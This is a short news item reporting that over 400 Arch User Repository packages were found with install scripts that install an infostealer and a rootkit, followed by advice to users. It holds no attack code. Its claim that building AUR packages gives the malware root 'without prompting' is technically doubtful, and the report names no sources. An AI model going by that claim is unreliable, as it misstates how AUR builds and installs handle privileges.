Over 400 packages in the Arch User Repository were found to contain malicious payloads.
Researchers analysing recent AUR submissions uncovered code that silently installs an infostealer and a rootkit. The affected packages span several popular categories, from development tools to system utilities. The malicious code is embedded in install scripts, so it runs automatically when users build the packages.
Arch users who trust the community‑maintained repository now have a new attack surface. Because AUR packages are built locally, the malware can gain root privileges on the host without prompting. The incident highlights the need for better auditing of community repositories and for users to verify source integrity before building.
If you rely on AUR, consider switching to vetted binaries or checking package hashes manually until the repository cleans up the compromised entries.